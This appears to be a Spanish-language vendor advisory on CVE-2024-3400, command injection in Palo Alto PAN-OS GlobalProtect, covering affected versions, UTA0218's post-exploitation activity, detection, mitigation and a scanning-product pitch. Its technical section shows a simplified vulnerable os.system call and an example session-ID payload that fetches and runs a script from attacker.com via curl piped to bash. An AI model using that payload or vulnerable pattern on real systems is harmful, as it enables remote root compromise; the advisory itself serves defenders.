CVE-2024-3400: inyección de comandos en Palo Alto PAN-OS — CVSS 10.0
CVE-2024-3400 es una vulnerabilidad de inyección de comandos del sistema operativo de máxima gravedad en la puerta de enlace GlobalProtect de Palo Alto Networks PAN-OS. Un atacante no autenticado puede ejecutar comandos arbitrarios del sistema operativo como root sin necesidad de interacción. Fue explotada por UTA0218 (probablemente patrocinado por un Estado) antes de su divulgación.
| Atributo | Valor |
|---|---|
| ID de CVE | CVE-2024-3400 |
| Vector CVSS | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-77: inyección de comandos del sistema operativo |
| Publicada | 12 de abril de 2024 |
| Explotación | Activa — CISA KEV, explotación por parte de un Estado nación |
¿Qué es CVE-2024-3400?
CVE-2024-3400 afecta a la funcionalidad GlobalProtect de Palo Alto Networks PAN-OS. Cuando GlobalProtect está configurado como puerta de enlace o portal, un atacante remoto no autenticado puede inyectar comandos arbitrarios del sistema operativo que se ejecutan con privilegios de root en el dispositivo de firewall.
La combinación de factores —sin necesidad de autenticación, accesible desde la red, cambio de ámbito e impacto máximo sobre la confidencialidad, la integridad y la disponibilidad— da como resultado una puntuación CVSS perfecta de 10.0. Entre los proveedores de firewalls, solo unas pocas vulnerabilidades han recibido esta puntuación.
🚨 Explotación por parte de un Estado nación antes de que el parche estuviera disponible
Volexity descubrió esta vulnerabilidad mientras respondía a un incidente en el que UTA0218, un sofisticado actor de amenazas, había desplegado una novedosa puerta trasera en Python llamada UPSTYLE en dispositivos PAN-OS comprometidos. El atacante utilizó el firewall como punto de pivote para acceder a redes internas, robar credenciales de Active Directory y exfiltrar datos confidenciales. Volexity estima que la explotación comenzó a finales de marzo de 2024, semanas antes de que Palo Alto fuera notificado.
Sistemas afectados
| Versión de PAN-OS | Afectada (GlobalProtect habilitado) | Versión corregida |
|---|---|---|
| PAN-OS 11.1 | < 11.1.2-h3 | 11.1.2-h3+ |
| PAN-OS 11.0 | < 11.0.4-h1 | 11.0.4-h1+ |
| PAN-OS 10.2 | < 10.2.9-h1 | 10.2.9-h1+ |
| PAN-OS 10.1 | < 10.1.14-h4 | 10.1.14-h4+ |
Requisito previo: debe estar configurada una puerta de enlace o un portal de GlobalProtect (show global-protect-gateway current-user devuelve resultados). Las organizaciones que no hayan configurado GlobalProtect no están afectadas.
Análisis técnico
El punto de inyección se encuentra en el código de gestión de sesiones de GlobalProtect. Cuando se establece una sesión de GlobalProtect, determinados atributos de la sesión se escriben en archivos temporales del firewall. El código que construye la ruta de estos archivos de sesión no depura correctamente el identificador de sesión, que está parcialmente controlado por el atacante.
# Construcción simplificada de la ruta de archivo vulnerable
SESSION_ID = request.cookie["SESSID"] # Controlado por el atacante
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}") # Inyección de comandos aquí
# El atacante crea un ID de sesión que contiene metacaracteres del shell:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"
La puerta trasera UPSTYLE instalada por UTA0218 utilizaba un novedoso mecanismo de persistencia: un script de Python que supervisaba los registros de acceso del servidor web en busca de patrones de solicitud específicos (que contenían un comando cifrado), ejecutaba los comandos y después restauraba el contenido original del archivo para eliminar las pruebas de la actividad.
Actividad posterior a la explotación (UTA0218)
Volexity documentó la siguiente secuencia posterior a la explotación realizada por actores de Estados nación:
- Despliegue de UPSTYLE: puerta trasera en Python instalada en la ruta del servidor web del firewall para obtener acceso persistente
- Extracción de credenciales: volcado de la configuración del firewall que contenía credenciales de VPN e información de enrutamiento interno
- Pivotaje interno: uso de la posición de confianza del firewall comprometido en la red para alcanzar hosts internos
- Consultas LDAP: enumeración de Active Directory mediante el acceso del firewall a la red interna
- Preparación de datos: compresión y exfiltración de archivos confidenciales a través del firewall
Detección
Análisis de registros de PAN-OS
# Buscar artefactos de la puerta trasera UPSTYLE find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null # Tráfico sospechoso en los registros de GlobalProtect grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log # Archivos del sistema modificados (UPSTYLE los modifica y después los restaura) # Comprobar tiempos de acceso recientes en los archivos del servidor web find /var/appweb -atime -7 -name "*.php" -o -name "*.py"
Consultas para la búsqueda de amenazas
- Respuestas HTTP 200 a rutas de GlobalProtect con formatos inusuales de cookies de sesión
- Conexiones salientes desde el plano de gestión del firewall hacia direcciones IP externas
- Consultas DNS desde PAN-OS a dominios que no figuran en la fuente de inteligencia de amenazas
- Marcas de tiempo inusuales de modificación en archivos de configuración del firewall
Mitigación
- Aplique el parche inmediatamente: instale las versiones de corrección urgente indicadas anteriormente. Se trata de una vulnerabilidad CVSS 10.0 explotada activamente; ningún retraso es aceptable.
- Solución provisional con Threat Prevention: en dispositivos sin parchear, habilite Threat Prevention con perfiles de seguridad en las interfaces de GlobalProtect. Palo Alto proporcionó firmas específicas de ID de amenazas.
- Deshabilite GlobalProtect si no es necesario: las organizaciones que no utilicen activamente GlobalProtect pueden deshabilitar temporalmente esta funcionalidad como solución provisional.
- Audite los archivos del firewall: ejecute el script proporcionado por Palo Alto para buscar UPSTYLE y otros artefactos posteriores a la explotación.
- Rote todas las credenciales: toda credencial almacenada en la configuración del firewall (certificados de VPN, credenciales de vinculación LDAP, etc.) debe considerarse comprometida.
💡 Directiva de emergencia de CISA: CISA emitió la Directiva de Emergencia 24-03, que exigía a todas las agencias federales de EE. UU. aplicar los parches o las medidas de mitigación antes del 19 de abril de 2024. La urgencia refleja la gravedad y la explotación activa por parte de sofisticados actores de amenazas.
Capacidad de detección de KENSAI
- Identificación de PAN-OS: KENSAI identifica dispositivos Palo Alto expuestos a Internet y sus versiones de PAN-OS, y señala las configuraciones vulnerables a CVE-2024-3400
- Detección de exposición de GlobalProtect: identifica si la puerta de enlace o el portal de GlobalProtect está habilitado en los dispositivos detectados
- Confirmación segura de la explotación: una sonda no destructiva verifica la posibilidad de explotación sin ejecutar comandos
- Análisis de indicadores de compromiso: busca indicadores de la puerta trasera UPSTYLE en rutas web accesibles
- Supervisión continua de la superficie de ataque: alerta sobre dispositivos PAN-OS recién descubiertos que se incorporan a su superficie de ataque externa
¿Está su infraestructura de Palo Alto expuesta a CVE-2024-3400?
KENSAI identifica al instante los dispositivos PAN-OS expuestos a Internet que son vulnerables a la inyección de comandos. No espere a que los actores de amenazas los encuentren primero.
Analice ahora su perímetro →